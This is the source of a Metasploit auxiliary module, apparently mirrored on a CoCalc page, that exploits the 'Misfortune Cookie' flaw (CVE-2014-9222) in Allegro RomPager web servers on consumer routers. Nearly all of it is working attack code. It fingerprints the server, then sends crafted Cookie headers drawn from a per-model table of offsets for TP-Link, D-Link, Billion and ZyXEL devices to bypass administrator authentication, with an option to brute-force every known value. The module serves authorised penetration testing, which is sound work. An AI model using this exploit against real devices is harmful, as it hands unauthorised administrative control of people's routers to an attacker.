CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Report

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",

15
        'Description' => %q{

16
          This module exploits HTTP servers that appear to be vulnerable to the

17
          'Misfortune Cookie' vulnerability which affects Allegro Software

18
          Rompager versions before 4.34 and can allow attackers to authenticate

19
          to the HTTP service as an administrator without providing valid

20
          credentials.

21
        },

22
        'Author' => [

23
          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module

24
          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module

25
          'Lior Oppenheim' # CVE-2014-9222

26
        ],

27
        'References' => [

28
          ['CVE', '2014-9222'],

29
          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],

30
          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices

31
          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC

32
        ],

33
        'DisclosureDate' => '2014-12-17',

34
        'License' => MSF_LICENSE

35
      )

36
    )

37


38
    register_options(

39
      [

40
        OptString.new('TARGETURI', [true, 'URI to test', '/']),

41
      ], Exploit::Remote::HttpClient

42
    )

43


44
    register_advanced_options(

45
      [

46
        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),

47
      ], Exploit::Remote::HttpClient

48
    )

49
  end

50


51
  def headers

52
    {

53
      'Referer' => full_uri

54
    }

55
  end

56


57
  # List of known values and models

58
  def devices_list

59
    known_devices = {

60
      :'AZ-D140W' =>

61
          {

62
            name: 'Azmoon', model: 'AZ-D140W', values: [

63
              [107367693, 13]

64
            ]

65
          },

66
      :'BiPAC 5102S' =>

67
            {

68
              name: 'Billion', model: 'BiPAC 5102S', values: [

69
                [107369694, 13]

70
              ]

71
            },

72
      :'BiPAC 5200' =>

73
            {

74
              name: 'Billion', model: 'BiPAC 5200', values: [

75
                [107369545, 9],

76
                [107371218, 21]

77
              ]

78
            },

79
      :'BiPAC 5200A' =>

80
            {

81
              name: 'Billion', model: 'BiPAC 5200A', values: [

82
                [107366366, 25],

83
                [107371453, 9]

84
              ]

85
            },

86
      :'BiPAC 5200GR4' =>

87
            {

88
              name: 'Billion', model: 'BiPAC 5200GR4', values: [

89
                [107367690, 21]

90
              ]

91
            },

92
      :'BiPAC 5200SRD' =>

93
            {

94
              name: 'Billion', model: 'BiPAC 5200SRD', values: [

95
                [107368270, 1],

96
                [107371378, 3],

97
                [107371218, 13]

98
              ]

99
            },

100
      :'DSL-2520U' =>

101
            {

102
              name: 'D-Link', model: 'DSL-2520U', values: [

103
                [107368902, 25]

104
              ]

105
            },

106
      :'DSL-2600U' =>

107
            {

108
              name: 'D-Link', model: 'DSL-2600U', values: [

109
                [107366496, 13],

110
                [107360133, 20]

111
              ]

112
            },

113
      :'TD-8616' =>

114
            {

115
              name: 'TP-Link', model: 'TD-8616', values: [

116
                [107371483, 21],

117
                [107369790, 17],

118
                [107371161, 1],

119
                [107371426, 17],

120
                [107370211, 5],

121
              ]

122
            },

123
      :'TD-8817' =>

124
            {

125
              name: 'TP-Link', model: 'TD-8817', values: [

126
                [107369790, 17],

127
                [107369788, 1],

128
                [107369522, 25],

129
                [107369316, 21],

130
                [107369321, 9],

131
                [107351277, 20]

132
              ]

133
            },

134
      :'TD-8820' =>

135
            {

136
              name: 'TP-Link', model: 'TD-8820', values: [

137
                [107369768, 17]

138
              ]

139
            },

140
      :'TD-8840T' =>

141
            {

142
              name: 'TP-Link', model: 'TD-8840T', values: [

143
                [107369845, 5],

144
                [107369790, 17],

145
                [107369570, 1],

146
                [107369766, 1],

147
                [107369764, 5],

148
                [107369688, 17]

149
              ]

150
            },

151
      :'TD-W8101G' =>

152
            {

153
              name: 'TP-Link', model: 'TD-W8101G', values: [

154
                [107367772, 37],

155
                [107367808, 21],

156
                [107367751, 21],

157
                [107367749, 13],

158
                [107367765, 25],

159
                [107367052, 25],

160
                [107365835, 1]

161
              ]

162
            },

163
      :'TD-W8151N' =>

164
            {

165
              name: 'TP-Link', model: 'TD-W8151N', values: [

166
                [107353867, 24]

167
              ]

168
            },

169
      :'TD-W8901G' =>

170
            {

171
              name: 'TP-Link', model: 'TD-W8901G', values: [

172
                [107367787, 21],

173
                [107368013, 5],

174
                [107367854, 9],

175
                [107367751, 21],

176
                [107367749, 13],

177
                [107367765, 25],

178
                [107367682, 21],

179
                [107365835, 1],

180
                [107367052, 25]

181
              ]

182
            },

183
      :'TD-W8901GB' =>

184
            {

185
              name: 'TP-Link', model: 'TD-W8901GB', values: [

186
                [107367756, 13],

187
                [107369393, 21]

188
              ]

189
            },

190
      :'TD-W8901N' =>

191
            {

192
              name: 'TP-Link', model: 'TD-W8901N', values: [

193
                [107353880, 0]

194
              ]

195
            },

196
      :'TD-W8951ND' =>

197
            {

198
              name: 'TP-Link', model: 'TD-W8951ND', values: [

199
                [107369839, 25],

200
                [107369876, 13],

201
                [107366743, 21],

202
                [107364759, 25],

203
                [107364759, 13],

204
                [107364760, 21]

205
              ]

206
            },

207
      :'TD-W8961NB' =>

208
            {

209
              name: 'TP-Link', model: 'TD-W8961NB', values: [

210
                [107369844, 17],

211
                [107367629, 21],

212
                [107366421, 13]

213
              ]

214
            },

215
      :'TD-W8961ND' =>

216
            {

217
              name: 'TP-Link', model: 'TD-W8961ND', values: [

218
                [107369839, 25],

219
                [107369876, 13],

220
                [107364732, 25],

221
                [107364771, 37],

222
                [107364762, 29],

223
                [107353880, 0],

224
                [107353414, 36]

225
              ]

226
            },

227
      :'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s

228
            {

229
              name: 'ZyXEL', model: 'P-660R-T3', values: [

230
                [107369567, 21]

231
              ]

232
            },

233
      :'P-660RU-T3 v2' => # Couldn't verify this

234
            {

235
              name: 'ZyXEL', model: 'P-660R-T3', values: [

236
                [107369567, 21]

237
              ]

238
            },

239
      ALL => # Used when `ForceAttempt` === true

240
            { name: 'Unknown', model: 'Forced', values: [] }

241
    }

242
    # collect all known cookies for a brute force option

243
    all_cookies = []

244
    known_devices.collect { |_, v| v[:values] }.each do |list|

245
      all_cookies += list

246
    end

247
    known_devices[:ALL][:values] = all_cookies.uniq

248
    known_devices

249
  end

250


251
  def check_response_fingerprint(res, fallback_status)

252
    fp = http_fingerprint(response: res)

253
    vprint_status("Fingerprint: #{fp}")

254
    # ensure the fingerprint at least appears vulnerable

255
    if %r{RomPager/(?<version>[\d.]+)} =~ fp

256
      vprint_status("#{peer} is RomPager #{version}")

257
      if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp

258
        return model

259
      end

260
    end

261
    fallback_status

262
  end

263


264
  def run

265
    res = send_request_raw(

266
      'uri' => normalize_uri(target_uri.path.to_s),

267
      'method' => 'GET'

268
    )

269
    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)

270
    if model != Exploit::CheckCode::Detected

271
      devices = devices_list[model.to_sym]

272
      devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']

273
      if !devices.nil?

274
        print_good("Detected device:#{devices[:name]} #{devices[:model]}")

275
        devices[:values].each do |value|

276
          cookie = "C#{value[0]}=#{'B' * value[1]}\x00"

277
          res = send_request_raw(

278
            'uri' => normalize_uri(target_uri.path.to_s),

279
            'method' => 'GET',

280
            'headers' => headers.merge('Cookie' => cookie)

281
          )

282
          if !res.nil? && (res.code <= 302)

283
            print_good('Good response, please check host, authentication should be disabled')

284
            break

285
          else

286
            print_error('Bad response')

287
          end

288
        end

289
      else

290
        print_error("No matching values for fingerprint #{model}")

291
      end

292
    else

293
      print_error('Unknown device')

294
    end

295
  end

296
end

297


298